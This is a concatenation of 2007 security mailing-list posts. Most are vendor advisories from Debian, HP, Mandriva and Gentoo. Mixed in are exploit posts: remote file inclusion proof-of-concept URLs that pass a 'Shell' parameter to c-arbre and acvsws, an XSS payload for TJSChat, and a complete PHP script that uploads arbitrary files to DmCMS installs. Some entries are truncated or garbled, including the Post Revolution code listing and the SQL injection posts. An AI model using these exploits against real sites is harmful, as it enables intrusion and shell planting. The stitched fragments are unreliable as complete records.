Post Revolution Remote File Inclusion
~~ Post Revolution Remote File Inclusion ~~ Affected Software .: Post Revolution 6.6 / 7.0 Release Candidate 2 Download..: http://www.fabio.com.ar/postrev/ Risk ..: high Date .: 25/3/2007 Found by ..: InyeXion Contact ...: InyeXion[at]gmail.com Web .: Www.InyeXion.com.ar ~~ Affected File: /common.php /themes/default/preview_post_completo.php Vulnerable Code: /common.php Line [10] include ($dir."themes/".$config_data["template"]."/encabezado.php"); Line [16] include ($dir."themes/".$config_data["template"]."/cuerpo.php"); Line [22] include ($dir."themes/".$config_data["template"]."/pie.php"); Line [37] include ($dir."themes/".$config_data["template"]."/menu_principal.php"); Line [49] include ($dir."themes/".$config_data["template"]."/error.php"); Line [129] include ($dir."themes/".$config_data["template"]."/login_form.php"); Line [135] include ($dir."themes/".$config_data["template"]."/logout.php"); Line [174] include ($dir."language/".$config_data["lang"].".php"); Line [272] include ($dir."language/".$config_data["lang"].".php"); Line [282] include ($dir."themes/".$config_data["template"]."/seccion.php"); Line [360] include ($dir."language/".$config_data["lang"].".php"); Line [446] include ($dir."themes/".$config_data["template"]."/post.php"); Line [460] include ($dir."language/".$config_data["lang"].".php"); Line [543] include ($dir."themes/".$config_data["template"]."/archivo_noticias.php"); Line [549] include ($dir."themes/".$config_data["template"]."/cuerpo_archivo.php"); Line [570] include ($dir."language/".$config_data["lang"].".php"); Line [628] include ($dir."themes/".$config_data["template"]."/post_completo.php"); Line [641] include ($dir."language/".$config_data["lang"].".php"); Line [661] include ($dir."language/".$config_data["lang"].".php"); Line [680] include ($dir."themes/".$config_data["template"]."/posts_usuario.php"); Line [692] include ($dir."language/".$config_data["lang"].".php"); Line [715] include ($dir."themes/".$config_data["template"]."/comment_encabezado.php"); Line [750] include ($dir."themes/".$config_data["template"]."/comment.php"); Line [770] include ($dir."themes/".$config_data["template"]."/comment_form.php"); Line [776] include ($dir."themes/".$config_data["template"]."/info.php"); Line [782] include ($dir."themes/".$config_data["template"]."/info.php"); Line [1054] include ($dir."language/".$config_data["lang"].".php"); Line [1106] include ($dir."themes/".$config_data["template"]."/encuesta_head.php"); Line [1124] include ($dir."themes/".$config_data["template"]."/encuesta_opc.php"); Line [1128] include ($dir."themes/".$config_data["template"]."/encuesta_pie.php"); Line [1159] include ($dir."themes/".$config_data["template"]."/encuesta_head_ver.php"); Line [1180] include ($dir."themes/".$config_data["template"]."/encuesta_opc_ver.php"); Line [1183] include ($dir."themes/".$config_data["template"]."/encuesta_pie_ver.php"); Line [1231] include ($dir."themes/".$config_data["template"]."/encuestas_anteriores.php"); Line [1242] include ($dir."themes/".$config_data["template"]."/tagmenu.php"); Line [1297] include ($dir."themes/".$config_data["template"]."/tagpost.php"); Line [1310] include ($dir."language/".$config_data["lang"].".php"); Line [1482] include ($dir."language/".$config_data["lang"].".php"); Line [1506] include ($dir."themes/".$config_data["template"]."/categoria_enlace.php"); Line [1521] include ($dir."themes/".$config_data["template"]."/enlacefila.php"); Line [1570] include ($dir."config.php"); Line [1676] include ($dir."language/".$config_data["lang"].".php"); Line [1678] include ($dir."themes/".$config_data["template"]."/buscar.php"); Line [1685] include ($dir."language/".$config_data["lang"].".php"); Line [1723] include ($dir."themes/".$config_data["template"]."/resultado.php"); Line [1730] include ($dir."language/".$config_data["lang"].".php"); Line [1766] include ($dir."themes/".$config_data["template"]."/busq-dato.php"); Line [1772] include ($dir."themes/".$config_data["template"]."/busq-resultado.php"); Line [1778] inc
c-arbre <= Multiple Remote File Include Vulnerablitiy
# c-arbre <= Multiple Remote File Include Vulnerablitiy # D.Script: http://fresh.t-systems-sfr.com/unix/src/www/c-arbre_0.6PR7_full.tar.gz # Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED] # Homepage: http://www.MoHaNdKo.cOm # Exploit:[Path]/c-arbre/espaces/communiques/annotations.php?root_path=Shell # Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
[SECURITY] [DSA 1279-1] New webcalendar packages fix cross-site scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1279-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 22nd, 2007http://www.debian.org/security/faq - -- Package: webcalendar Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-6669 It was discovered that WebCalendar, a PHP-based calendar application, performs insufficient sanitising in the exports handler, which allows injection of web script. For the old stable distribution (sarge) this problem has been fixed in version 0.9.45-4sarge7. The stable distribution (etch) no longer contains WebCalendar packages. For the unstable distribution (sid) this problem has been fixed in version 1.0.5-2. We recommend that you upgrade your webcalendar package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.dsc Size/MD5 checksum: 608 0c12e6c6307413350af264045a4df964 http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7.diff.gz Size/MD5 checksum:13013 ced8d9c6f7d52a42c3297a685547cb06 http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45.orig.tar.gz Size/MD5 checksum: 612360 a6a66dc54cd293429b604fe6da7633a6 Architecture independent components: http://security.debian.org/pool/updates/main/w/webcalendar/webcalendar_0.9.45-4sarge7_all.deb Size/MD5 checksum: 629712 39fca1d949580d18e1e293a1c181b1a8 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGK3fhXm3vHE4uyloRAiHOAJ0QtrQgIsQBKm6qCmWWfBwRWG6G0gCffVxw MuZS2n/wJveeDEn8ZJUPrv4= =CkBR -END PGP SIGNATURE-
Ripe Website Manager (<= 0.8.4) - SQL Injection Vulnerability and Cross-Site Scripting Exploit
Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploit Ripe Website Manager (<= 0.8.4) - Cross-Site Scripting and SQL Injection Exploitdiscovered by http://john-martinelli.com";>John MartinelliGoogle d0rk: http://www.google.com/search?q=%22Powered+by+Ripe+Website+Manager>"Powered by Ripe Website Manager" http://www.example.com/path/contact/index.php"; method="post">
[security bulletin] HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00841370 Version: 1 HPSBUX02183 SSRT061243 rev.1 - HP-UX sendmail, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-04-16 Last Updated: 2007-04-17 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running sendmail. This vulnerability could allow a remote user to cause a Denial of Service (DoS). References: none SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00 (obsolete) running sendmail 8.9.3 or sendmail 8.11.1, HP-UX B.11.11 running sendmail 8.9.3 or sendmail 8.11.1, HP-UX B.11.23 running sendmail 8.11.1. BACKGROUND To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS For sendmail 8.11.1 HP-UX B.11.23 === InternetSrvcs.INETSVCS2-RUN action: install PHNE_35485 or subsequent HP-UX B.11.11 === SMAIL-UPGRADE.INETSVCS-SMAIL action: install revision B.11.11.02.004 or subsequent HP-UX B.11.00 === SMAIL-811.INETSVCS-SMAIL action: remove (use sendmail 8.9.3) or upgrade to HP-UX B.11.11 For sendmail 8.9.3 HP-UX B.11.11 === InternetSrvcs.INETSVCS-RUN action: install PHNE_35484 or subsequent For sendmail 8.9.3 HP-UX B.11.00 = InternetSrvcs.INETSVCS-RUN action: install PHNE_35483 or subsequent END AFFECTED VERSIONS Note: sendmail 8.13.3 currently available from http://software.hp.com does not exhibit this DoS issue. sendmail 8.11.1 is no longer available from http://software.hp.com for HP-UX B.11.11; customers are encouraged to upgrade to sendmail 8.13.3. RESOLUTION HP has made the following patches available to resolve the issue. The patches are available from http://itrc.hp.com For sendmail 8.11.1, HP-UX B.11.23 Install: PHNE_35485 or subsequent sendmail -bs banner: Sendmail 8.11.1 (Revision 1.10)/8.11.1 what(1) string: version.c 8.11.1 (Berkeley) - 01 December 2006 (PHNE_35485) For sendmail 8.11.1, HP-UX B.11.11 Please write to [EMAIL PROTECTED] for more information. For sendmail 8.11.1, HP-UX B.11.00 Use sendmail 8.9.3 or upgrade to B.11.11 or subsequent. There will be no update to sendmail 8.11.1 for HP-UX B.11.00 to resolve the vulnerability. For sendmail 8.9.3, HP-UX B.11.11 Install: PHNE_35484 or subsequent sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3 what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35484) For sendmail 8.9.3, HP-UX B.11.00 Install: PHNE_35483 or subsequent sendmail -bs banner: Sendmail 8.9.3 (Revision 1.10)/8.9.3 what(1) string: version.c 8.9.3 (Berkeley) 01 December 2006 (PHNE_35483) MANUAL ACTIONS: Yes - NonUpdate HP-UX B.11.11 sendmail 8.11.1 - Write to [EMAIL PROTECTED] HP-UX B.11.00 sendmail 8.11.1 - Use sendmail 8.9.3 or upgrade to HP-UX B.11.11 or subsequent HP-UX B.11.23 sendmail 8.11.1 - No manual actions HP-UX B.11.11 sendmail 8.9.3 - No manual actions HP-UX B.11.00 sendmail 8.9.3 - No manual actions PRODUCT SPECIFIC INFORMATION HP_UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?_productNumber=B6834AA HISTORY: Version: 1 (rev.1) - 16 April 2007 Initial release Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subsc
phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploitdiscovered by http://john-martinelli.com";>John MartinelliGoogle d0rk: http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22";>"Powered by Ripe Website Manager" http://www.example.com/path/modules/news/article.php"; method="get">
3proxy 0.5.3i bugfix release
Background: 3proxy [1] is universal multifunctional free open source proxy server with multiple protocols supports (HTTP/HTTPS/Ftp over HTTP, POP3, FTP, SOCKS 4/4.5/5, UDP and TCP portmapping, DNS proxy) with ACL-based access control, proxy chaining, traffic accounting, bandwidth limitation, configurable logging, etc for Windows/Linux/Unix. Description: On April, 14 3proxy development team released urgent 0.5.3h update [2] for 3proxy, fixing stack-based buffer overflow vulnerability in both Windows and Linux/Unix 3proxy versions 0.5-0.5.3g and 0.6-devel branch before date of the fix (CVE-2007-2031) [3]. Vulnerability was found during bug report investigation. Binary 3proxy 0.6-devel distribution is compiled with stack protection. On April, 20 reviewed 0.5.3i version [2] of 3proxy was released, fixing few security unrelated functionality issues with bandwidth limitation and traffic limitation. Update information: All 3proxy users are advised to update to latest 0.5.3i (or at least 0.5.3h) or 0.6-devel version [4]. Please subscribe to three-proxy-announce mailing list [5] to be immediately informed on new 3proxy releases. Announce: 0.6 version of 3proxy introduces extended access control / traffic control features and plugins/extensions support. Windows authentication is in beta testing, regular expressions filtering/rewriting plugin is in alpha testing, LDAP plugin is in development, antiviral plugins are planned for development. We invite port maintainers, developers and beta testers. References: [1] 3proxy official homepage http://3proxy.ru/ [2] 3proxy 0.5.3i Changelog http://3proxy.ru/0.5.3i/Changelog.txt [3] CVE-2007-2031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031 [4] 3proxy download page http://3proxy.ru/download/ [5] 3proxy announcements mailing list at Sourceforge https://lists.sourceforge.net/lists/listinfo/three-proxy-announce
TJSChat Version 0.95 Cross Site Scripting
""" """ :: ::: """ """ :: :: :: : ::""" """ :: :: : : """ """:: :: ::: ::: :: :: :: :::: """ """ :: :: :: : : : :: :: """ """ """ """ Xmor$ Security Vulnerability Research TM # Tilte: TJSChat Version 0.95 Cross Site Scripting # Author..: [the_Edit0r] # HomePage: [Www.XmorS-SEcurity.coM] [Www.XmorS.coM] # Location ...: [Iran] # Software ...: [TJSChat] # Site Script : [http://www.toutjavascript.com] # We ArE .: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel ] --- proof Of Concept --- www.example.com/[path]/you.php?user=alert(/the_Edit0r/); --- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM]
acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerablitiy
# acvsws_php5_v1.0 <= Multiple Remote File Include Vulnerablitiy # D.Script: http://www.acvsnet.net/DNN ACVS/Portals/0/_Commun/WebServices/acvsws_php5_v1.0_release.zip/ # Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED] # Homepage: http://www.MoHaNdKo.cOm # Exploit:[Path]/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell # Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm #Greetz To: aLL mY Friends
RE: Yet another SQL injection framework
The script simply hides or shows the link on the page which points to sf. http://sourceforge.net/projects/injection-fwk/ -Original Message- From: Nick Boyce [mailto:[EMAIL PROTECTED] Sent: Friday, April 20, 2007 9:13 AM To: bugtraq@securityfocus.com Cc: Guillermo Marro Subject: Re: Yet another SQL injection framework On 4/19/07, Guillermo Marro <[EMAIL PROTECTED]> wrote: > FG-Injector is a free tool that leverages the pentester's work by > facilitating the exploitation of SQL Injection vulnerabilities. [...] > Get both, sources and a windows binary from: > http://www.flowgate.net/?lang=en&seccion=herramientas Um .. when I click on the link for "FG-Injector" at the above site with my NoScript-enabled Firefox all I see is what looks like a server log entry for my interaction : aaa.bbb.ccc.ddd Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 /injector This is presumably because the actual links are infested with Javascript : onClick="javascript:showStaff('injector')" Since I'm following links in an email on a security mailing list I'm disinclined to disable NoScript - any chance you can convert the links into normal HREFs ? I could go and grab your Javascript library and figure out what 'showStaff' does ... but I'd rather just click on an old-school link. Cheers Nick Boyce -- I speak to all bloggers everywhere: just shut up for a second and let me think, will you? -- blog comment at http://it-gears.blogspot.com/ :-)
DmCMS Shell Uploading
Hello Title : DmCMS Shell Upload Discovered by : HACKERS PAL Copyrights : HACKERS PAL Website : WwW.SoQoR.NeT Email : [EMAIL PROTECTED] File .. includes/upload_file.php After Giving Some conditions will allow you to upload any file you want the exploit here is the proof .. exploit : #!/usr/bin/php -q -d short_open_tag=on */ /* site: http://www.soqor.net */'); if ($argc<4) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host path topath /* Example: */ /*php '.$argv[0].' localhost /dmcms/ ../media/ /**/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } function connect($packet) { global $host, $port, $html; $con=fsockopen(gethostbyname($host),$port); if (!$con) { echo '[-] Error - No response from '.$host.':'.$port; die; } fputs($con,$packet); $html=''; while ((!feof($con)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($con,1); } GLOBAL $html; fclose($con); } $i=0; $data=""; function add_data($name,$value,$type="no",$filename) { GLOBAL $data,$i; if($type=="file") { $data.="-7d62702f250530 Content-Disposition: form-data; name=\"$filename\"; filename=\"$name\"; Content-Type: text/plain $value "; } elseif($type=="init") { $data.="-7d62702f250530--"; } elseif($type=="clean") { $data=""; } else { $data.="-7d62702f250530 Content-Disposition: form-data; name=\"$name\"; Content-Type: text/plain $value "; } } $host=$argv[1]; $path=$argv[2]; $default_path=$argv[3]; $port=80; $cmd=urlencode($cmd); $p='http://'.$host.':'.$port.$path; Echo "\n[+] Trying to Upload File"; $cookie="Master=HACKERS20%PAL"; $contents=''; add_data("empty.php","","file","File1"); add_data("soqor.php",$contents,"file","File2"); add_data("soqor.php",$contents,"file","File3"); add_data('','',"init"); $packet="POST ".$p."includes/upload_file.php?default_path=$default_path HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Referer: http://".$host.$path."ok.php?do=act\r\n";; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---7d62702f250530\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: ".$cookie."\r\n\r\n"; $packet.=$data; connect($packet); if (!eregi($default_path,$html)) { echo"\n/* [+] Successfully Exploited"; } echo ("\n/* Visit us : WwW.SoQoR.NeT */\n/**/"); ?> #WwW.SoQoR.NeT
[ MDKSA-2007:093 ] - Updated zziplib packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:093 http://www.mandriva.com/security/ ___ Package : zziplib Date: April 23, 2007 Affected: Corporate 4.0 ___ Problem Description: A stack-based buffer overflow in the ZZIPlib library could allow user-assisted remote attackers to cause an application crash (DoS) or execute arbitrary code via a long filename. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1614 ___ Updated Packages: Corporate 4.0: a0ac9e92d0beee7726739000791e6748 corporate/4.0/i586/zziplib0-0.13.33-4.1.20060mlcs4.i586.rpm 1518189e431ccd97aa491a4591de80d6 corporate/4.0/i586/zziplib0-devel-0.13.33-4.1.20060mlcs4.i586.rpm c17957866cab01574723960484e792a9 corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 91e3feceacc5f9fd7629525d1be8b951 corporate/4.0/x86_64/zziplib0-0.13.33-4.1.20060mlcs4.x86_64.rpm 641b79b72b74306264f8cc40b89ecf68 corporate/4.0/x86_64/zziplib0-devel-0.13.33-4.1.20060mlcs4.x86_64.rpm c17957866cab01574723960484e792a9 corporate/4.0/SRPMS/zziplib-0.13.33-4.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGLO2pmqjQ0CJFipgRAh2lAJsFOiiEm3c5n10Jlbdy2D2FOGXq9ACg7YDJ /HL9x4tONQFyI8wRo+wDE3M= =jMiN -END PGP SIGNATURE-
[ GLSA 200704-20 ] NAS: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: NAS: Multiple vulnerabilities Date: April 23, 2007 Bugs: #171428 ID: 200704-20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis The Network Audio System is vulnerable to a buffer overflow that could result in the execution of arbitrary code with root privileges. Background == NAS is a network transparent, client/server audio transport system. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-libs/nas < 1.8b >= 1.8b Description === Luigi Auriemma has discovered multiple vulnerabilities in NAS, some of which include a buffer overflow in the function accept_att_local(), an integer overflow in the function ProcAuWriteElement(), and a null pointer error in the function ReadRequestFromClient(). Impact == An attacker having access to the NAS daemon could send an overly long slave name to the server, leading to the execution of arbitrary code with root privileges. A remote attacker could also send a specially crafted packet containing an invalid client ID, which would crash the server and result in a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All NAS users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/nas-1.8b" References == [ 1 ] CVE-2007-1543 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1543 [ 2 ] CVE-2007-1544 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1544 [ 3 ] CVE-2007-1545 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1545 [ 4 ] CVE-2007-1546 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1546 [ 5 ] CVE-2007-1547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1547 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-20.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpYftazAFgAb.pgp Description: PGP signature
[ MDKSA-2007:092 ] - Updated freeradius packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:092 http://www.mandriva.com/security/ ___ Package : freeradius Date: April 23, 2007 Affected: Corporate 4.0 ___ Problem Description: Multiple buffer overflows were found in the FreeRADIUS package version 1.0.4 and prior that could allow a remote attacker to cause a crash via the rlm_sqlcounter module (CVE-2005-4746). As well, an SQL injection vulnerability was also found in the rlm_sqlcounter that could allow a remote attacker to execute arbitrary SQL commands via unknown attack vectors (CVE-2005-4745). Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4745 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4746 ___ Updated Packages: Corporate 4.0: 523055be4399355565d6175d7df13ca7 corporate/4.0/i586/freeradius-1.0.4-2.4.20060mlcs4.i586.rpm 4e000a3cb2c8cb2f3359a961878a310a corporate/4.0/i586/libfreeradius1-1.0.4-2.4.20060mlcs4.i586.rpm 3e9f17beada7d6d10235c6db8156a77a corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.4.20060mlcs4.i586.rpm 0429cf3dda93772e358fc34a1d5cb1f8 corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.4.20060mlcs4.i586.rpm 216c28ffac0b1d03a493d5548556be2d corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.4.20060mlcs4.i586.rpm 07ebd1dbb7d4f1a71253ebab163f1dd8 corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.4.20060mlcs4.i586.rpm 9b3586d1c94b6cf650723a095db846d7 corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.4.20060mlcs4.i586.rpm 10b8fb70adfc1a641b2f63c041db1069 corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.4.20060mlcs4.i586.rpm 0fb72186b61687df8dedff8d874fbb86 corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 435d07e3a5878cb0fd27e02fbee702df corporate/4.0/x86_64/freeradius-1.0.4-2.4.20060mlcs4.x86_64.rpm f57c46977fbd86772852f21d138605de corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.4.20060mlcs4.x86_64.rpm bcc4dc4cac18ed3d034483de311fe240 corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.4.20060mlcs4.x86_64.rpm 646309915542dad2b6e68ff130fead11 corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.4.20060mlcs4.x86_64.rpm 039290c0f429ff9f5ecf1ce13b17765f corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.4.20060mlcs4.x86_64.rpm 0ca4c838dae5657c3f902ed2234a7286 corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.4.20060mlcs4.x86_64.rpm a48ad352690163f2fd90f022007bcd7a corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.4.20060mlcs4.x86_64.rpm e8aea2d0c9a45462ef30ab0113b62164 corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.4.20060mlcs4.x86_64.rpm 0fb72186b61687df8dedff8d874fbb86 corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFGLO1nmqjQ0CJFipgRAsFaAJ9co3OlDWZ/TbgBhXObcQQisfeV7wCglV83 4mS7Fi8Nr26rU13+J4dlRxM= =UflY -END PGP SIGNATURE-
FLEA-2007-0012-1: madwifi
Foresight Linux Essential Advisory: 2007-0012-1 Published: 2007-04-22 Rating: Moderate Updated Versions: madwifi=/[EMAIL PROTECTED]:devel//fl:desktop//[EMAIL PROTECTED]:1-devel//1/0.9.3-0.0.0.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-1 References: https://issues.foresightlinux.org/browse/FL-263 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180 Description: Previous versions of the madwifi package were vulnerable to a number of Denial-of-Service issues, at least two of which can be exploited to cause a system crash (kernel oops). In addition, previous versions could be made to send unencrypted information before authentication finishes when using WPA, an information leak.
[ GLSA 200704-19 ] Blender: User-assisted remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Blender: User-assisted remote execution of arbitrary code Date: April 23, 2007 Bugs: #168907 ID: 200704-19 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in Blender allowing for user-assisted arbitrary code execution. Background == Blender is a 3D creation, animation and publishing program. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 media-gfx/blender < 2.43>= 2.43 Description === Stefan Cornelius of Secunia Research discovered an insecure use of the "eval()" function in kmz_ImportWithMesh.py. Impact == A remote attacker could entice a user to open a specially crafted Blender file (.kmz or .kml), resulting in the execution of arbitrary Python code with the privileges of the user running Blender. Workaround == There is no known workaround at this time. Resolution == All Blender users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-gfx/blender-2.43" References == [ 1 ] CVE-2007-1253 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-19.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. 